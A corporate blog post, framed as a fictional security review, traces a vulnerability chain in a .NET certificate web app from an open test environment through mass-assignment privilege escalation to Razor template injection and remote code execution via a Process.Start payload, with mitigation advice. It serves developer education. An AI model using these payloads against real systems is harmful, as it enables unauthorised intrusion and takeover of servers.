
How I gained remote code execution and what we can learn as software developers

Stiig Gade, Advisory Software Developer, Solita

Published 07 Jun 2023

Reading time 5 min

The following post is a fictional security review, based on an aggregate of experiences with cyber security in software development and with conducting security reviews.

What is remote code execution (RCE)?

According to OWASP, RCE (or in their terms, code injection) is the process of injecting code, which is then interpreted or executed by an application or system. Personally, I consider this the holy grail of vulnerabilities. If an attacker achieves RCE, they can quickly take over the system and establish a foothold/persistence, so they can easily access said system afterwards.

Why am I even hacking?

Even though we are a tech, data and design company, we also offer cyber security services. We truly believe that security is a fundamental cornerstone of software development, and not a feature which is implemented as an afterthought in the last sprint, “because we have to”. By doing security reviews, we raise awareness of this fact both internally and externally, which improves the quality of our products, and helps clients reduce their attack surface.

Gaining access

I have been tasked with finding vulnerabilities in a system used to generate certificates. I start by powering up Burp Suite and browsing around the test environment to get a feel for the website. New users need to be approved by a moderator before gaining access to the system. Well, in production at least; it turns out that users get auto-approved in the test environment.

This would be alright if the test environment were behind a VPN, but it's open to the public. I have now gained access to the test environment, and so can everyone else. This in itself may not seem too worrying, but let's see where we can go from here.

Information exposure

I am a normal user in this system, and the only thing I can do is print certificates from predefined templates. The endpoint is GET /certificate/render/1?name=Stiig, which renders said certificate with my name. For every endpoint I find, I poke at it with variations of requests, such as POST/PUT, and with all kinds of input. POST'ing to said endpoint returns unauthorised, but because this is a test environment, I also get an error message and a stack trace:

[Screenshot: error message and stack trace returned by the test environment]

From this, it doesn't take long to infer that the user entity has a relationship to a moderator entity, but as I am not a moderator, it seems I don't have that entity.
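
To illustrate what such a trace gives away, the user entity presumably looks something like the following sketch (the property names are assumptions inferred from the stack trace, not the actual code):

    public class Moderator
    {
        public int Id { get; set; }
    }

    public class User
    {
        public int Id { get; set; }
        public string Name { get; set; }
        public string Email { get; set; }
        public string Password { get; set; }

        // The relationship hinted at by the stack trace
        public int? ModeratorId { get; set; }
        public Moderator Moderator { get; set; }
    }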

Privilege escalation

The system has an endpoint PUT /users, which is used to update my own information. It takes a user entity that consists of name, email and password. But what if I extend this information with ModeratorId? Often the first user created in a system is an admin user, so id 1 seems like a valid option.

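Something along these lines (a sketch of the request; the exact field casing and the email address are made up for illustration):

    PUT /users HTTP/1.1
    Content-Type: application/json

    {
      "name": "Stiig",
      "email": "stiig@example.com",
      "password": "********",
      "moderatorId": 1
    }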

Looks like it was a success. Now I have escalated my privileges so that I can modify templates. One step at a time, we breach further and further.

This could have been avoided by specifying an input model which only has the desired properties.

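A minimal sketch in C#, assuming property names matching the entity:

    // Input model exposing only the properties a user may change themselves.
    public class UpdateUserInput
    {
        public string Name { get; set; }
        public string Email { get; set; }
        public string Password { get; set; }
        // No ModeratorId here, so it can never be bound from a request.
    }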

Now the deserialised input will not include ModeratorId, so it isn't possible to change.

Server-side template injection exploit

As mentioned, the system allows for the creation of templates if you have the proper privileges – which I do now. Let's attempt to create one, but with special characters, to see if the website is vulnerable. Testing which payload to use can easily be automated with various tools, but as I know this system runs .NET, I start by manually testing with the @ sign, which denotes expressions in Razor.

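For example, a template body like this (a sketch; the surrounding certificate markup is an assumption):

    <p>Certificate awarded to @Model.Name</p>
    <p>@(2+2)</p>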

Now, when rendering this template, we can see that the code is executed.

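Illustratively, the rendered output now contains the computed value instead of the raw payload (the certificate text is assumed):

    Certificate awarded to Stiig
    4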

The payload sent was @(2+2), which is interpreted by the Razor engine.

Accessing the host

Time to verify if we can access the host system, which can easily be done with a simple payload:

@System.Diagnostics.Process.Start("cmd.exe", "/c echo i_was_here > C:/temp/test.txt")


If this payload gets interpreted, we will create a file on the host system. Let's attempt to GET this template.
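The request would look along these lines (the template id 2 is hypothetical):

    GET /certificate/render/2?name=Stiig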

And then the final check, to see if the file was created.
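One way to check without access to the host is to reuse the same injection channel, for example with a payload like this (a sketch, assuming the file path from above):

    @System.IO.File.ReadAllText("C:/temp/test.txt")

If the rendered template now contains i_was_here, the process was started and the file was written.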

As we have proof that we can start processes on the remote system, we have gained remote code execution and thus can infiltrate the host machine. And we did it in three small steps, each of which may have seemed innocuous, but which together enabled the holy grail of vulnerabilities.

Escaping the containment

When conducting security reviews, we must abide by certain rules. These rules exist both for the customer's protection and for our own, so that we don't break something by mistake. In this case, I don't want to access other systems, but I do want to verify whether a potential attacker would be able to. For this purpose, I can list the other IIS websites hosted by the machine; the output confirms that test and production are hosted on the same machine.
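One way to produce such a listing is to shell out to IIS's appcmd tool from the injected template (a sketch; the site names below are made up for illustration):

    C:\Windows\System32\inetsrv\appcmd.exe list sites

    SITE "certificates-test" (id:1,bindings:http/*:80:,state:Started)
    SITE "certificates-prod" (id:2,bindings:https/*:443:,state:Started)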

Always separate different environments, so that if an attacker gains access to one, they can't reach the others.

What is the takeaway?

The point of this post isn't how to mitigate the individual vulnerabilities, but that systems are often compromised through multiple vulnerabilities used in conjunction with one another. Reports of vulnerabilities are often brushed aside with the argument that exploitation requires other dependencies (like elevated rights). But as we have seen here, many small vulnerabilities can be stitched together into a large breach.

I want developers to change their fundamental way of thinking during development. When you implement functionality which handles user interaction, like an API, think evil. Think about how it could be exploited, and then think about how that can be mitigated. Every single mitigated vulnerability reduces the attack surface not only of the system itself, but also of other internal and external systems.
